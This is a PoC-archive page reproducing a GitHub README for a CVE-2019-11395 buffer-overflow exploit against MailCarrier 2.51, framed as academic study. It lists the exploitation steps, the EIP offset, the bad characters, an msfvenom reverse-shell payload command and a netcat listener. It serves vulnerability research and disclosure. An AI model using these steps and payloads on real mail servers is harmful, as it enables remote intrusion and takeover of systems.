Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-11395 PoC — Taps Lab MailCarrier 缓冲区错误漏洞

Source
https://github.com/caioprince/CVE-2019-11395
Associated Vulnerability
Title:Taps Lab MailCarrier 缓冲区错误漏洞 (CVE-2019-11395)
Description:A buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long string, as demonstrated by SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR.
Description
A exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.
Readme
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
</head>

<body>
  <h1 align="center">CVE-2019-11395 Exploit 🛡️</h1>

  <h2>About CVE-2019-11395 🕵️</h2>

  <p>The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.</p>

  <p>During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes it to stop functioning, thus revealing the buffer overflow vulnerability.</p>

  <h2>Exploitation Steps 🔍</h2>

  <ol>
    <li>Utilized <code>msf-pattern_create -l 6000</code> to accurately identify the EIP.</li>
    <li>Identified the EIP offset with <code>msf-pattern_offset -q 6E47386E -l 6000</code>, resulting in an EIP offset of 5095.</li>
    <li>Identified <code>expsrv.dll</code> with ASLR disabled, suitable for a JMP ESP.</li>
    <li>Identified bad characters <code>\x00\x0a\x0d</code> during tests for invalid characters.</li>
    <li>Generated payload with <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Adjusted the <code>CVE-2019-11395.py</code> code to accommodate the payload.</li>
    <li>Opened connection with <code>nc -lnvp 4444</code> and executed the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>

  <h2>Usage 🚀</h2>

<p>Follow these steps to utilize the exploit:</p>

<ol>
  <li>Generate the payload using <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
  <li>Copy the output of the <code>msfvenom</code> command.</li>
  <li>Adjust the <code>CVE-2019-11395.py</code> code to replace the <code>shellcode</code> variable with the output obtained from the <code>msfvenom</code> command.</li>
  <li>Execute the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
</ol>


  
  <h2>Compromised Environment 📸</h2>
  
  <img src="https://github.com/caioprince/CVE-2019-11395/blob/main/CVE-2019-11395.png" alt="PoC CVE-2019-11395" width="500">

 <section>
        <h2>🔗 Connect with me</h2>
        <p>Visit my profile on <a href="https://www.linkedin.com/in/caio-paiva-cyber-security/" target="_blank">LinkedIn</a></p>
    </section>
</body>

</html>
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →